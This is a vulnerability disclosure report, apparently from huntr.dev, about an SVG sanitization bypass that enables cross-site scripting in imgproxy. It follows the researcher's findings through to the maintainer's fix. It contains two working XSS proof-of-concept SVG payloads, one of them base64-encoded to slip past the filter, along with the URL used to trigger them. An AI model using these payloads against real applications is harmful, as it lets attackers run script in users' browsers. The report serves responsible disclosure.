SVG Sanitization Bypass - XSS in imgproxy/imgproxy

Valid

Reported on

Jan 12th 2023

Description

In imgproxy application, we bypassed the svg sanitization function. In this way, attacker can craft malicious svg file and run javascript on the application.

Proof of Concept

Here is the content of the malicious svg file.

<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>
<image href="1" onerror="alert(1)" />
</svg>

After that you can call this svg file like below.

http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg

Impact

In this way, attacker can craft malicious svg file and run javascript on the application.

We are processing your report and will contact the imgproxy team within 24 hours. 4 months ago
Emre Durmaz
4 months ago

Researcher

Hi again,

We realized that your latest commit prevent this payload on latest version.So this vulnerability report is valid for v3.12.0 version. :)

https://github.com/imgproxy/imgproxy/blob/f89ced23e49a834f2e7c40862597d24774416396/svg/svg.go#L30

We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Emre Durmaz
4 months ago

Researcher

Hi again,

We also bypassed the latest version.

https://github.com/imgproxy/imgproxy/blob/master/svg/svg.go#L30

PoC Payload

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <use xlink:href="data:application/xml;base64 ,
PHN2ZyBpZD0ndGVzdCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#test"/>
</svg>

http://127.0.0.1:8080/unsafe/plain/<svg-file-url>/test.svg

Code

case xml.StartTagToken:
            if strings.ToLower(string(l.Text())) == "script" {
                ignoreTag++
                continue
            }
            buf.Write(tdata)
        case xml.AttributeToken:
            if _, unsafe := unsafeAttrs[strings.ToLower(string(l.Text()))]; unsafe {
                continue
            }
            buf.Write(tdata)
Emre Durmaz modified the report
4 months ago
We have opened a pull request with a SECURITY.md for imgproxy to merge. 4 months ago
Emre Durmaz
4 months ago

Researcher

Hi there,

Regarding this issue, they requested that the vulnerability be reported via e-mail. Will you send an e-mail or shall we send an e-mail?

We have contacted a member of the imgproxy team and are waiting to hear back 3 months ago
imgproxy/imgproxy maintainer
3 months ago

Maintainer

Hi Emre!

Thanks for catching this! I added the fix with https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689

Also, imgproxy sets the Content-Security-Policy header since v3.13.0, so this vulnerability shouldn't work if the browser respects Content-Security-Policy.

Emre Durmaz
3 months ago

Researcher

Hi there,

Thanks for the fix. Can you set this report as resolved?

Regards

imgproxy/imgproxy maintainer validated this vulnerability 3 months ago
Emre Durmaz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Emre Durmaz
3 months ago

Researcher

Hi huntr.dev team,

How can we get CVE?

Can you help with CVE?

Regards

Ben Harvie
3 months ago

Admin

CVE assignment is in the hands of the maintainer at the fix and publish stage of the report, please request this from the maintainer, rather than admins, thanks!

imgproxy/imgproxy maintainer marked this as fixed in 3.14.0 with commit 62f8d0 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
imgproxy/imgproxy maintainer published this vulnerability 2 months ago
to join this conversation